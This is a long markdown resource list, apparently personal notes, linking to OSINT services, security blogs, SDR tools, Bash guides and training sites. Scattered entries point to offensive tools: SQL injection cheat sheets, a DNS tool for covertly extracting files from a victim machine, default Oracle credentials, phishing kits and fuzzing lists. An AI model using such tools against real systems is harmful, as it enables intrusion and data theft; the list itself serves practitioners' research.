* Another collection of examples: [http://www.regular-expressions.info/examples.html](http://www.regular-expressions.info/examples.html) * Includes a collection of regexes for apikeys/tokens [https://github.com/m4ll0k/SecretFinder/blob/master/BurpSuite-SecretFinder/SecretFinder.py](https://github.com/m4ll0k/SecretFinder/blob/master/BurpSuite-SecretFinder/SecretFinder.py) * "Regular Expressions: Regexes in Python" by John Sturtz [https://realpython.com/regex-python/](https://realpython.com/regex-python/) and part 2 [https://realpython.com/regex-python-part-2/](https://realpython.com/regex-python-part-2/) * *Related...* Personally Identifiable Information (PII) Redactor shell script [https://github.com/infinite-omicron/pii-redactor/blob/master/pii_redactor.sh](https://github.com/infinite-omicron/pii-redactor/blob/master/pii_redactor.sh) ### DOS/Windows Shell * Guide to Batch Scripting [http://steve-jansen.github.io/guides/windows-batch-scripting/](http://steve-jansen.github.io/guides/windows-batch-scripting/) ### Information Sources for your Security Investigations** A starter list of information sources for your security investigations & integrations: (Thank you https://github.com/cloudtracer/ThreatPinchLookup) * Awesome OSINT [https://github.com/jivoi/awesome-osint](https://github.com/jivoi/awesome-osint) * Ammar Amer's OSINT resources [https://github.com/blaCCkHatHacEEkr/OSINT_TIPS](https://github.com/blaCCkHatHacEEkr/OSINT_TIPS) * Discover Your Attack Surface [https://github.com/intrigueio/intrigue-core](https://github.com/intrigueio/intrigue-core) * Alienvault OTX for IPv4, CVE, MD5, SHA1 and SHA2 lookups [https://otx.alienvault.com/](https://otx.alienvault.com/) * Bitcoin Whos Who for Bitcoin lookups [http://bitcoinwhoswho.com/](http://bitcoinwhoswho.com/) * BlockChain.info for Bitcoin lookups [https://blockchain.info/](https://blockchain.info/) * BTC for Bitcoin lookups [https://btc.com/](https://btc.com/) * Censys.io for IPv4 lookups [https://censys.io/](https://censys.io/) * CIRCL (Computer Incident Response Center Luxembourg) for CVE lookups [https://www.circl.lu/](https://www.circl.lu/) * Google Safe Browsing for URL lookups [https://safebrowsing.google.com/](https://safebrowsing.google.com/) * Have I Been Pwned for Email lookups [https://haveibeenpwned.com](https://haveibeenpwned.com) * IBM XForce Exchange for IPv4, EFQDN lookups [https://exchange.xforce.ibmcloud.com[](https://exchange.xforce.ibmcloud.com/) * IP Geo Tool {free} for your script integration: [https://tools.keycdn.com/geo.json?host={IP or hostname}](https://tools.keycdn.com/geo.json?host={IP or hostname}) Important: See [https://tools.keycdn.com/geo](https://tools.keycdn.com/geo) for configuring your request header User-Agent string correctly. * MISP for MD5 and SHA2 [http://www.misp-project.org/](http://www.misp-project.org/) * Also consider MISP Taxonomies for your integration work [https://github.com/MISP/misp-taxonomies/](https://github.com/MISP/misp-taxonomies/) * PassiveTotal for FQDN Whois lookups [https://www.passivetotal.org/](https://www.passivetotal.org/) * PulseDive for IPv4, FQDN and URL lookups [https://pulsedive.com/](https://pulsedive.com/) * Recorded Future for IPv4, FQDN, MD5, SHA1 and SHA2 lookups [http://recordedfuture.com/](http://recordedfuture.com/) * For IP lookups and much more: * Shodan [https://www.shodan.io/](https://www.shodan.io/) * Search Query Fundamentals: [https://help.shodan.io/the-basics/search-query-fundamentals](https://help.shodan.io/the-basics/search-query-fundamentals) * REST and Streaming API Queries: [https://developer.shodan.io/api/banner-specification](https://developer.shodan.io/api/banner-specification) * Docker image to run [Shodan CLI](https://github.com/achillean/shodan-python): [https://github.com/crazy-max/docker-shodan](https://github.com/crazy-max/docker-shodan) * Greynoise [https://viz.greynoise.io/trends](https://viz.greynoise.io/trends) * ZoomEye for IPv4 lookups [https://www.zoomeye.org/](https://www.zoomeye.org/) * Cloud IP Ranges [https://github.com/nccgroup/cloud_ip_ranges](https://github.com/nccgroup/cloud_ip_ranges) * CDN IP Ranges [https://github.com/six2dez/ipcdn](https://github.com/six2dez/ipcdn) * ThreatCrowd for IPv4, FQDN and MD5 lookups [https://www.threatcrowd.org/](https://www.threatcrowd.org/) * ThreatMiner: IPv4, Email, FQDN, MD5, SHA1 and SHA2 lookups [https://www.threatminer.org/](https://www.threatminer.org/) * Wigle for WiFi [https://wigle.net/](https://wigle.net/) * Sourcecode Search [https://publicwww.com/](https://publicwww.com/) * Utility to identify active committers participating in targeted repositories or github.com organizations. [https://github.com/kaakaww/contributors_tool](https://github.com/kaakaww/contributors_tool) * Find *professional* email addresses [https://hunter.io/](https://hunter.io/) * VirusTotal for MD5, SHA1, SHA2, URL and FQDN lookups [https://www.virustotal.com/](https://www.virustotal.com/) * Buster, An advanced tool for email reconnaissance [https://github.com/sham00n/buster](https://github.com/sham00n/buster) * WayBulk, Search a list of domains on the wayback machine [https://github.com/sham00n/waybulk](https://github.com/sham00n/waybulk) * General outline of information about a specific host or domain [https://webrate.org/site/website-hostname/](https://webrate.org/site/website-hostname/) (**replace "*website-hostname*" with your target.**) ### Math and Statistics * Statistics in Pandas Cheatsheet [https://cheatsheets.quantecon.org/stats-cheatsheet.html](https://cheatsheets.quantecon.org/stats-cheatsheet.html) * Manish Saraswat's list of Free books on statistics mathematics data science [http://www.analyticsvidhya.com/blog/2016/02/free-read-books-statistics-mathematics-data-science/](http://www.analyticsvidhya.com/blog/2016/02/free-read-books-statistics-mathematics-data-science/) * Chen's Free Data Science Books [http://www.wzchen.com/data-science-books/](http://www.wzchen.com/data-science-books/) * balban's Free Statistics Books [https://github.com/balban/Books/tree/master/Statistics](https://github.com/balban/Books/tree/master/Statistics) * "Unsupervised Cross-lingual Representation Learning at Scale" by Alexis Conneau and Kartikay Khandelwal, et.al. [https://arxiv.org/pdf/1911.02116.pdf](https://arxiv.org/pdf/1911.02116.pdf) * "What Is a Time-Series Plot, and How Can You Create One?" [https://www.timescale.com/blog/what-is-a-time-series-plot-and-how-can-you-create-one/](https://www.timescale.com/blog/what-is-a-time-series-plot-and-how-can-you-create-one/) * "How to Work With Time Series in Python?" [https://www.timescale.com/blog/how-to-work-with-tim/](https://www.timescale.com/blog/how-to-work-with-tim/) * "Tools for Working With Time-Series Analysis in Python" [https://www.timescale.com/blog/tools-for-working-with-time-series-analysis-in-python/](https://www.timescale.com/blog/tools-for-working-with-time-series-analysis-in-python/) * Complete guide to create a Time Series Forecast (Python) [http://www.analyticsvidhya.com/blog/2016/02/time-series-forecasting-codes-python/](http://www.analyticsvidhya.com/blog/2016/02/time-series-forecasting-codes-python/) and in R [http://www.analyticsvidhya.com/blog/2015/12/complete-tutorial-time-series-modeling/](http://www.analyticsvidhya.com/blog/2015/12/complete-tutorial-time-series-modeling/) * [Mathics](https://mathics.org/) is a general-purpose computer algebra system (CAS). The mathics-core repository contains just the Python modules for WL Built-in functions, variables, core primitives, e.g. Symbol, a parser to create Expressions, and an evaluator to execute them. [https://github.com/Mathics3/mathics-core](https://github.com/Mathics3/mathics-core) ### Text to Speech * eSpeak NG [https://github.com/espeak-ng/espeak-ng](https://github.com/espeak-ng/espeak-ng) * Using eSpeak and eSpeakNG [https://vitux.com/convert-text-to-voice-with-espeak-on-ubuntu/](https://vitux.com/convert-text-to-voice-with-espeak-on-ubuntu/) * eSpeak NG TTS Bindings for Python3 [https://github.com/sayak-brm/espeakng-python](https://github.com/sayak-brm/espeakng-python) * Larynx -- This engine provides a complete text-to-speech solution for 9 languages in as many as 50 voices and can be used without any proprietary cloud services (*each voice is roughly 250MB*). This project includes an *easy path* using a Docker image. [https://github.com/rhasspy/larynx](https://github.com/rhasspy/larynx) ### Random Cheat Sheets * Cheat Sheets from a terminal via curl: [http://cheat.sh/](http://cheat.sh/) * OWASP Cheat Sheet Series index: [https://github.com/OWASP/CheatSheetSeries/blob/master/Index.md](https://github.com/OWASP/CheatSheetSeries/blob/master/Index.md) and [https://cheatsheetseries.owasp.org/](https://cheatsheetseries.owasp.org/) * Massive list of links to lists associated with programming and languages [https://neverendingsecurity.wordpress.com/category/documents-manuals/mind-maps/](https://neverendingsecurity.wordpress.com/category/documents-manuals/mind-maps/) * SQL Injection Cheat Sheet [https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) * Collection of SQL Injection Cheat Sheets [https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet](https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) * Random reminder of how SQL Joins work. [http://blog.codinghorror.com/a-visual-explanation-of-sql-joins/](http://blog.codinghorror.com/a-visual-explanation-of-sql-joins/) Browse the comments as well. And if that doesn't do it, try [http://gplivna.blogspot.com/2008/01/sql-join-types-im-studying-bit-sql.html](http://gplivna.blogspot.com/2008/01/sql-join-types-im-studying-bit-sql.html) * "awesome-incident-response" a curated list of tools and resources for security incident response [https://github.com/meirwah/awesome-incident-response](https://github.com/meirwah/awesome-incident-response) * Incident "Debriefing Facilitation Guide -- Leading Groups at Etsy to Learn From Accidents." by: John Allspaw, Morgan Evans, Daniel Schauenberg; 2016 [http://extfiles.etsy.com/DebriefingFacilitationGuide.pdf](http://extfiles.etsy.com/DebriefingFacilitationGuide.pdf) and in MarkDown format: [https://github.com/etsy/DebriefingFacilitationGuide](https://github.com/etsy/DebriefingFacilitationGuide) * "Digital Services Playbook." [https://playbook.cio.gov/](https://playbook.cio.gov/) and the source in MarkDown at: [https://github.com/usds/playbook](https://github.com/usds/playbook) * 101 Machine Learning Algorithms for Data Science with Cheat Sheets [https://blog.datasciencedojo.com/machine-learning-algorithms/](https://blog.datasciencedojo.com/machine-learning-algorithms/) * An extensive list of filetypes and the application(s) associated with them [https://github.com/vscode-icons/vscode-icons/wiki/ListOfFiles](https://github.com/vscode-icons/vscode-icons/wiki/ListOfFiles) ### Several Tech Company Research & Security Blogs** * AppScan Standard and AppScan Enterprise Forum [http://www.ibm.com/developerworks/forums/forum.jspa?forumID=1320&start=0](http://www.ibm.com/developerworks/forums/forum.jspa?forumID=1320&start=0) * Fortify AppSecurity Blog [https://community.microfocus.com/cyberres/tags/Fortify](https://community.microfocus.com/cyberres/tags/Fortify) * Fortify Security Research Blog [https://community.microfocus.com/cyberres/b/off-by-on-software-security-blog](https://community.microfocus.com/cyberres/b/off-by-on-software-security-blog) * HP AppSecurity Feed [https://twitter.com/HPappsecurity](https://twitter.com/HPappsecurity) * IBM Security-Intelligence Feed [http://securityintelligence.com/](http://securityintelligence.com/) * IBM Research News [http://ibmresearchnews.blogspot.com/](http://ibmresearchnews.blogspot.com/) * IBM Research Home [http://www.research.ibm.com/](http://www.research.ibm.com/) * IBM Community Blogs [https://www-304.ibm.com/connections/communities/service/html/allcommunities](https://www-304.ibm.com/connections/communities/service/html/allcommunities) * IBM DeveloperWorks Blogs -- Recent Updates [https://www.ibm.com/developerworks/](https://www.ibm.com/developerworks/community/groups/service/html/community/updates?communityUuid=81c130c7-4408-4e01-adf5-658ae0ef5f0c&filter=all) * Microsoft Research Blogs [https://www.microsoft.com/en-us/research/blog/](https://www.microsoft.com/en-us/research/blog/) * Microsoft Cybersecurity Blog [https://www.microsoft.com/security/blog/](https://www.microsoft.com/security/blog/) * Microsoft Office365 Developer Blog [https://developer.microsoft.com/en-us/office](https://developer.microsoft.com/en-us/office) supported by [https://github.com/OfficeDev](https://github.com/OfficeDev) * Google Online Security Blog [http://googleonlinesecurity.blogspot.com/](http://googleonlinesecurity.blogspot.com/) * Google AppSecurity Research [https://www.google.com/about/appsecurity/research/](https://www.google.com/about/appsecurity/research/) and supporting details at [https://code.google.com/p/google-security-research/issues/list?can=1](https://code.google.com/p/google-security-research/issues/list?can=1) * PortSwigger (Burp) Blog [http://blog.portswigger.net/](http://blog.portswigger.net/) * Apple Research News/Blog/Home [oops, I guess there aren't any security blogs here](oops, I guess there aren't any) But Apple hubris is in the press -- Here is a page with links to journalism on the Pegasus Project: [https://www.msnbc.com/rachel-maddow-show/pegasus-project-media-index-n1274437](https://www.msnbc.com/rachel-maddow-show/pegasus-project-media-index-n1274437) ### Respect software author's license decisions** * Software licensing explained [https://en.wikipedia.org/wiki/Software_license](https://en.wikipedia.org/wiki/Software_license) * Comparison of free and open-source software licenses [http://en.wikipedia.org/wiki/Comparison_of_free_and_open-source_software_licenses](http://en.wikipedia.org/wiki/Comparison_of_free_and_open-source_software_licenses) * Open Source Initiative list of links to license information [http://opensource.org/licenses](http://opensource.org/licenses) * "Various Licenses and Comments about Them" from GNU [http://www.gnu.org/philosophy/license-list.html](http://www.gnu.org/philosophy/license-list.html) * "Software Licenses in Plain English -- Lookup popular software licenses summarized at-a-glance." [https://tldrlegal.com/](https://tldrlegal.com/) ### Various public documents, whitepapers and articles about APT campaigns * APTnotes is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets. [https://github.com/aptnotes/data](https://github.com/aptnotes/data) or go directly to the resource links at [https://github.com/aptnotes/data/blob/master/APTnotes.csv](https://github.com/aptnotes/data/blob/master/APTnotes.csv) ### Verify those shortened URLs** * [https://tinyurl.com/preview.php](https://tinyurl.com/preview.php) * [http://checkshorturl.com/](http://checkshorturl.com/) * URL-Expander / URL-Unshortener [http://urlex.org/](http://urlex.org/) ### Find the code you need** * In a hurry? Try asking OpenAI's ChatGPT to write what you need: [https://chat.openai.com/chat](https://chat.openai.com/chat) * Awesome Algorithms -- A curated list of awesome places to learn and/or practice algorithms [https://github.com/tayllan/awesome-algorithms](https://github.com/tayllan/awesome-algorithms) * [http://c2.com/cgi/wiki?FindPage](http://c2.com/cgi/wiki?FindPage) * A large collection of sorting algorithms in many languages [https://github.com/search?q=sorting+algorithms&ref=reposearch&utf8=%E2%9C%93](https://github.com/search?q=sorting+algorithms&ref=reposearch&utf8=%E2%9C%93) * Competitive Programming, algorithms and data structures [https://algocoding.wordpress.com/](https://algocoding.wordpress.com/) ### Then copy & morph** * virtualenv is a tool to create isolated Python environments [https://virtualenv.pypa.io/en/latest/](https://virtualenv.pypa.io/en/latest/) * A relatively quick Python Numpy Tutorial by Justin Johnson. [http://cs231n.github.io/python-numpy-tutorial/](http://cs231n.github.io/python-numpy-tutorial/) ### Risk Management Frameworks * Financial Services Sector "Cybersecurity Profile" - 280 'diagnostic statements' [https://www.fsscc.org/Financial-Sector-Cybersecurity-Profile ](https://www.fsscc.org/Financial-Sector-Cybersecurity-Profile ) * NIST SP-800-53 v4 []() ### Stay Informed** (in no particular order - and thank you Joe Fleischman for the starter set) * Krebs On Security [http://krebsonsecurity.com/](http://krebsonsecurity.com/) * Schneier on Security [https://www.schneier.com/](https://www.schneier.com/) * IBM X-Force Home [http://securityintelligence.com/topics/x-force/](http://securityintelligence.com/topics/x-force/) * Security Bloggers Network [https://securityboulevard.com/sbn/](https://securityboulevard.com/sbn/) * News from NetCraft [https://news.netcraft.com/](https://news.netcraft.com/) and their security category at [https://news.netcraft.com/archives/category/security/](https://news.netcraft.com/archives/category/security/) * Help Net Security [http://www.net-security.org/secworld_main.php](http://www.net-security.org/secworld_main.php) * Malwarebytes Blog [https://blog.malwarebytes.org/](https://blog.malwarebytes.org/) * Sophos NakedSecurity Blog [https://nakedsecurity.sophos.com/](https://nakedsecurity.sophos.com/) * FreedomHacker [http://freedomhacker.net/](http://freedomhacker.net/) * Wired Threat Level [http://www.wired.com/category/threatlevel](http://www.wired.com/category/threatlevel) * Homeland Security News Wire [http://www.homelandsecuritynewswire.com/topics/cybersecurity](http://www.homelandsecuritynewswire.com/topics/cybersecurity) * CNET [http://www.cnet.com/topics/security/](http://www.cnet.com/topics/security/) * Threat Post [https://threatpost.com/](https://threatpost.com/) * SC Magazine [http://www.scmagazine.com/news/section/100/](http://www.scmagazine.com/news/section/100/) * Reddit (cybersecurity) [http://www.reddit.com/r/cybersecurity/](http://www.reddit.com/r/cybersecurity/) * Mashable (cybersecurity) [http://mashable.com/category/cybersecurity/](http://mashable.com/category/cybersecurity/) * Fierce IT Security [http://www.fierceitsecurity.com/](http://www.fierceitsecurity.com/) (and for more details) * 1 Raindrop [http://1raindrop.typepad.com/1_raindrop/](http://1raindrop.typepad.com/1_raindrop/) * Information Week Dark Reading [http://www.darkreading.com/](http://www.darkreading.com/) * Dark Reading aggregation of news about attacks and breaches [https://www.darkreading.com/attacks-breaches.asp](https://www.darkreading.com/attacks-breaches.asp) * White Hat Security Blog [https://www.whitehatsec.com/blog/](https://www.whitehatsec.com/blog/) * Sucuri Blog [https://blog.sucuri.net/](https://blog.sucuri.net/) * FireEye Blog [https://www.fireeye.com/blog/threat-research.html](https://www.fireeye.com/blog/threat-research.html) * SANS Security Awareness Blog [http://www.securingthehuman.org/blog](http://www.securingthehuman.org/blog) * SANS Digital Forensics Blog [http://digital-forensics.sans.org/blog](http://digital-forensics.sans.org/blog) * SEI Blog [https://insights.sei.cmu.edu/blog/](https://insights.sei.cmu.edu/blog/) * System Forensics [http://www.sysforensics.org/](http://www.sysforensics.org/) * System Admin, Powershell (*inactive*) [http://sysadminconcombre.blogspot.ca/](http://sysadminconcombre.blogspot.ca/) * BOT24 [http://www.bot24.com/](http://www.bot24.com/) * DDoS Illustrations at [http://www.digitalattackmap.com/](http://www.digitalattackmap.com/) Thank you Diego Navarro. * Kite Blog: [https://kite.com/blog](https://kite.com/blog) * AWS Week in Review: [https://aws.amazon.com/blogs/aws/tag/week-in-review/](https://aws.amazon.com/blogs/aws/tag/week-in-review/) **Software Defined Radio (SDR)** * Overview: [http://microhams.blob.core.windows.net/content/2017/03/RTL-SDR-dongle.pdf](http://microhams.blob.core.windows.net/content/2017/03/RTL-SDR-dongle.pdf) * FISSURE -- Frequency Independent SDR-based Signal Understanding and Reverse Engineering -- an open-source RF and reverse engineering framework for signal detection and classification, protocol discovery, vulnerability analysis and more [https://github.com/ainfosec/FISSURE](https://github.com/ainfosec/FISSURE) * Big List of SDR Applications: [https://wiki.radioreference.com/index.php/SDR_Software_Applications](https://wiki.radioreference.com/index.php/SDR_Software_Applications) * PDW (Paging decoder for monitoring POCSAG, FLEX, ACARS, MOBITEX & ERMES pager traffic): [http://www.discriminator.nl/pdw/index-en.html](http://www.discriminator.nl/pdw/index-en.html) and [https://github.com/Discriminator/PDW](https://github.com/Discriminator/PDW) * Unitrunker: [http://www.unitrunker.com/](http://www.unitrunker.com/) (pager RF-to-text?). Manuals at: [http://utahradio.org/mediawiki/index.php/UniTrunker_Guide](http://utahradio.org/mediawiki/index.php/UniTrunker_Guide) and [http://www.unitrunker.com/windows.html](http://www.unitrunker.com/windows.html) and [http://www.unitrunker.com/realtek.html](http://www.unitrunker.com/realtek.html) Supported protocols (definitions at: http://wiki.radioreference.com/): o APCO P25 o EDACS 4800 o EDACS 9600 o Motorola o MPT1327 * SDRTrunk * DMRDecode * ?? Digital Speech Decoder (software package) * R820T (integrated multi‐band RF tuner IC implemented in CMOS) data sheet: [https://www.rtl-sdr.com/wp-content/uploads/2013/04/R820T_datasheet-Non_R-20111130_unlocked1.pdf](https://www.rtl-sdr.com/wp-content/uploads/2013/04/R820T_datasheet-Non_R-20111130_unlocked1.pdf) * Rafael Micro R820T2 Data Sheet (24-1766 MHz, newer lower noise version of the R820T): Some info in [https://www.rtl-sdr.com/wp-content/uploads/2018/02/RTL-SDR-Blog-V3-Datasheet.pdf](https://www.rtl-sdr.com/wp-content/uploads/2018/02/RTL-SDR-Blog-V3-Datasheet.pdf) and register descriptions here: [https://www.rtl-sdr.com/r820t2-register-description-data-sheet-now-available/](https://www.rtl-sdr.com/r820t2-register-description-data-sheet-now-available/) and [https://www.rtl-sdr.com/wp-content/uploads/2016/12/R820T2_Register_Description.pdf](https://www.rtl-sdr.com/wp-content/uploads/2016/12/R820T2_Register_Description.pdf) * Source Code examples for interacting with the R820TU: [https://github.com/emeb/r820t2/tree/master/f030_r820t2](https://github.com/emeb/r820t2/tree/master/f030_r820t2) * "Hello, world!" for GNSS-SDR: [http://gnss-sdr.org/my-first-fix/](http://gnss-sdr.org/my-first-fix/) * Dump 1090 is a Mode S decoder specifically designed for RTLSDR devices [https://github.com/antirez/dump1090](https://github.com/antirez/dump1090) * An improved webinterface for use with ADS-B decoders readsb / dump1090-fa [https://github.com/wiedehopf/tar1090](https://github.com/wiedehopf/tar1090) ### Temporary list for new work tools * Top-like interface for container metrics - ctop provides a concise and condensed overview of real-time metrics for multiple containers [https://github.com/bcicen/ctop](https://github.com/bcicen/ctop) or one of the others at [https://github.com/veggiemonk/awesome-docker/blob/master/README.md#terminal](https://github.com/veggiemonk/awesome-docker/blob/master/README.md#terminal) * A collection of minimal Docker images: [https://github.com/vektorcloud](https://github.com/vektorcloud) * Another collection of specialized Docker images: [https://github.com/jessfraz/dockerfiles](https://github.com/jessfraz/dockerfiles) * A collection of Docker files from CenturyLink Labs: [https://github.com/CenturyLinkLabs?q=&type=&language=dockerfile](https://github.com/CenturyLinkLabs?q=&type=&language=dockerfile) * Awesome-Security: [https://github.com/sbilly/awesome-security](https://github.com/sbilly/awesome-security) * Awesome console services [https://github.com/gnebbia/awesome-console-services](https://github.com/gnebbia/awesome-console-services) * 'The Book of Secret Knowledge' - A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more: [https://github.com/trimstray/the-book-of-secret-knowledge](https://github.com/trimstray/the-book-of-secret-knowledge) * A pair of tools for running phishing campaigns to raise security awareness: Swordphish Phishing Awareness Tool [https://github.com/certsocietegenerale/swordphish-awareness/](https://github.com/certsocietegenerale/swordphish-awareness/) and the Outlook add-in companion to report suspicious mail easily [https://github.com/certsocietegenerale/NotifySecurity](https://github.com/certsocietegenerale/NotifySecurity) * W3C HTML Tidy - Usage: 'curl <someURL> | Tidy -iq' [http://www.html-tidy.org/](http://www.html-tidy.org/) and [https://github.com/htacg/tidy-html5](https://github.com/htacg/tidy-html5) * CanaryTokens [https://canarytokens.org/generate](https://canarytokens.org/generate) * Canary (a 'honeypot' appliance) [https://canary.tools/](https://canary.tools/) * WebSphere Password Decoders: [http://strelitzia.net/wasXORdecoder/wasXORdecoder.html](http://strelitzia.net/wasXORdecoder/wasXORdecoder.html) * Conference Session Search Service - Con Collector (broken) but they still list conferences [https://www.thinkst.com/ts.html](https://www.thinkst.com/ts.html) * Some Open Source Network Monitoring Tools: ** Snort: [https://www.snort.org/downloads](https://www.snort.org/downloads) ** Suricata: [https://suricata-ids.org/](https://suricata-ids.org/) ** Bro: [https://www.bro.org/](https://www.bro.org/) ** OSSEC - Open Source HIDS SECurity [https://ossec.github.io/](https://ossec.github.io/) * Lists of IP addresses by Country - use to block or to assess your log data, etc. [http://www.ipdeny.com/ipblocks/](http://www.ipdeny.com/ipblocks/) * Words are important, choose them well [https://wordnik.com/](https://wordnik.com/) * Check a site or service [https://www.hurl.it/](https://www.hurl.it/) * G Suite Toolbox Browserinfo -- very handy [https://toolbox.googleapps.com/apps/browserinfo/](https://toolbox.googleapps.com/apps/browserinfo/) * A useful set of app-friendly utilities [https://httpbin.org/](https://httpbin.org/), for example, what is your current IP address [https://httpbin.org/ip](https://httpbin.org/ip) * A fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests [https://github.com/m57/dnsteal](https://github.com/m57/dnsteal) * A collection of default Oracle usernames and passwords [https://github.com/Oweoqi/oracle_creds](https://github.com/Oweoqi/oracle_creds) * Sometimes you need a little local web server [https://github.com/kzahel/web-server-chrome](https://github.com/kzahel/web-server-chrome) * Sometimes only ASCII is needed/allowed -- Convert a HTML table into ASCII table using Python: Colspan and Rowspan allowed [https://github.com/gustavklopp/DashTable](https://github.com/gustavklopp/DashTable) * Reference (probably dated, but better than nothing) List of all generic top level domains [https://github.com/kyleconroy/gtlds](https://github.com/kyleconroy/gtlds) * FuzzDB Project [https://github.com/fuzzdb-project/fuzzdb](https://github.com/fuzzdb-project/fuzzdb) * Free IP geolocation API: 'curl http://api.db-ip.com/v2/free/<IP-Address>' or curl http://api.db-ip.com/v2/free/<IP-Address>/countryName [up to 1000/day] * GetGeoIPContext web service to easily look up countries by Context [http://www.webservicex.net/geoipservice.asmx/GetGeoIPContext?](http://www.webservicex.net/geoipservice.asmx/GetGeoIPContext?) (Caution: as of October 2021, they are using a self-signed certificate) * GetGeoIP web service to easily look up countries by IP address [http://www.webservicex.net/geoipservice.asmx/GetGeoIP?IPAddress=string](http://www.webservicex.net/geoipservice.asmx/GetGeoIP?IPAddress=string) * Get domain name registration record by Host Name / Domain Name (WhoIS) [http://www.webservicex.net/whois.asmx/GetWhoIS?HostName=string](http://www.webservicex.net/whois.asmx/GetWhoIS?HostName=string) * Get weather report for any major cities around the world [http://www.webservicex.net/globalweather.asmx/GetWeather?CityName=string&CountryName=string](http://www.webservicex.net/globalweather.asmx/GetWeather?CityName=string&CountryName=string) * A much better way to get weather! ...in your terminal [https://github.com/chubin/wttr.in](https://github.com/chubin/wttr.in) and then try some one-liners, for example: * ~$ curl https://wttr.in/yourCity?format="%l:+%t+%w+%h+%f" * in your .bashrc: alias weather='curl https://wttr.in/yourCity' * A high-functioning command line tool that displays the current weather (from OpenWeather) in the terminal written in Rust [https://github.com/gourlaysama/girouette](https://github.com/gourlaysama/girouette) * Website style analyzer for designers [http://stylifyme.com/](http://stylifyme.com/) and source at: [https://github.com/micmro/Stylify-Me](https://github.com/micmro/Stylify-Me) * A python script that generates different sizes favicons from one image [https://github.com/Hecsall/favicon-generator](https://github.com/Hecsall/favicon-generator) ### Bash Shell * [https://github.com/alebcay/awesome-shell](https://github.com/alebcay/awesome-shell) * Bash scripting CheatSheet [https://devhints.io/bash](https://devhints.io/bash) * Bash for the shell novice: * [http://swcarpentry.github.io/shell-novice/](http://swcarpentry.github.io/shell-novice/) * [https://help.ubuntu.com/community/Beginners/BashScripting](https://help.ubuntu.com/community/Beginners/BashScripting) * Shell script static analysis tool -- a lint for bash/sh/zsh [shellcheck](https://github.com/koalaman/shellcheck) * Pure Bash Bible [https://github.com/dylanaraps/pure-bash-bible](https://github.com/dylanaraps/pure-bash-bible) * Bash Strict Mode by Aaron Maxwell [http://redsymbol.net/articles/unofficial-bash-strict-mode/](http://redsymbol.net/articles/unofficial-bash-strict-mode/) * Slack CLI via pure bash [https://github.com/rockymadden/slack-cli](https://github.com/rockymadden/slack-cli) * [https://github.com/herrbischoff/awesome-osx-command-line](https://github.com/herrbischoff/awesome-osx-command-line) * A beginner's guide to setting up a development environment on macOS [https://github.com/nicolashery/mac-dev-setup](https://github.com/nicolashery/mac-dev-setup) * A collection of one-liners [https://github.com/jlevy/the-art-of-command-line#one-liners](https://github.com/jlevy/the-art-of-command-line#one-liners) ### Misinformation / Disinformation are Rampant -- Check Those 'Facts' * AP Fact Check: https://www.ap.org/ * Check Your Fact: https://checkyourfact.com/ * El Detector / Univision Noticias: https://www.univision.com/especiales/noticias/detector/ * FactCheck.org, Annenberg Public Policy Center: https://www.factcheck.org/ * MediaWise: https://www.poynter.org/mediawise/ * Politifact: http://www.politifact.com/ * Snopes: https://www.snopes.com/ * T Verifica (Noticias Telemundo): https://www.telemundo.com/noticias/t-verifica * The Dispatch Fact Check: https://thedispatch.com/ * Washington Post Fact Checker: https://www.washingtonpost.com/news/fact-checker/ This is a subset of the longer list at: https://ifcncodeofprinciples.poynter.org/signatories ### Development Environment on a Mac * A beginner's guide to setting up a development environment on macOS [https://github.com/nicolashery/mac-dev-setup](https://github.com/nicolashery/mac-dev-setup) * "A shell script which turns your Mac into an awesome web development machine." [https://github.com/18F/laptop](https://github.com/18F/laptop) ### There is probably some free training for that... * Find a class at https://www.classcentral.com/search or https://www.classcentral.com/subjects * Find out about assistance at: https://www.classcentral.com/help/moocs * By universities (938 on 12 Sept 2020): https://www.classcentral.com/universities * By sub-groups of universities: https://www.classcentral.com/collection/ivy-league-moocs * By commercial Institutions (551 on 12 Sept 2020): https://www.classcentral.com/institutions * Free Online Learning Due to Coronavirus - ClassCentral maintains a list of temporarily free courses at: https://www.classcentral.com/report/free-online-learning-coronavirus/ * M.I.T. offers free content on OpenCourseWare: https://ocw.mit.edu/index.htm * Open Culture lists more than 1,500 courses: http://www.openculture.com/freeonlinecourses * Coursera https://www.coursera.org/ and https://www.classcentral.com/report/coursera-free-certificate-covid-19/ * edX https://www.edx.org/ * FutureLearn https://www.futurelearn.com/ and https://www.classcentral.com/report/futurelearn-free-certificates/ * Udacity https://www.udacity.com/ * Udemy https://www.udemy.com/courses/free/ * Upgrad https://www.upgrad.com/free-courses/ * Full reference of LinkedIn answers 2021 for skill assessments, LinkedIn test, questions and answers [https://github.com/Ebazhanov/linkedin-skill-assessments-quizzes](https://github.com/Ebazhanov/linkedin-skill-assessments-quizzes) ### Quantum Computing Resources** Here are some resources to learn more about this topic: * Open-Source Quantum Development. Qiskit [quiss-kit] is an open-source SDK for working with quantum computers at the level of pulses, circuits, and application modules. (*Python 3.7+ in a virtual environment with Anaconda*) [quiskit](https://www.qiskit.org/) * IBM Quantum Lab [https://quantum-computing.ibm.com/lab](https://quantum-computing.ibm.com/lab) * Also see my resources page at [https://github.com/mccright/rand-notes/blob/master/quantum-computing.md](https://github.com/mccright/rand-notes/blob/master/quantum-computing.md) ###Temporary list for work tools or other resources requiring more follow-up * An architecture decision record (ADR) is a document that captures an important architecture decision made along with its context and consequences. [Joel Parker Henderson](https://github.com/joelparkerhenderson) has a lot of resources to get you started at: [https://github.com/joelparkerhenderson/architecture-decision-record/tree/main](https://github.com/joelparkerhenderson/architecture-decision-record/tree/main) * How have I known about ripgrep (rg) - an excellent '*grep*' for searching through files in a directory tree? [https://github.com/BurntSushi/ripgrep](https://github.com/BurntSushi/ripgrep) * Get Windows Token Information [https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-OSTokenInformation.ps1](https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Get-OSTokenInformation.ps1) * flaskql-playground [https://github.com/cmpilato/flaskql-playground](https://github.com/cmpilato/flaskql-playground) * also look into 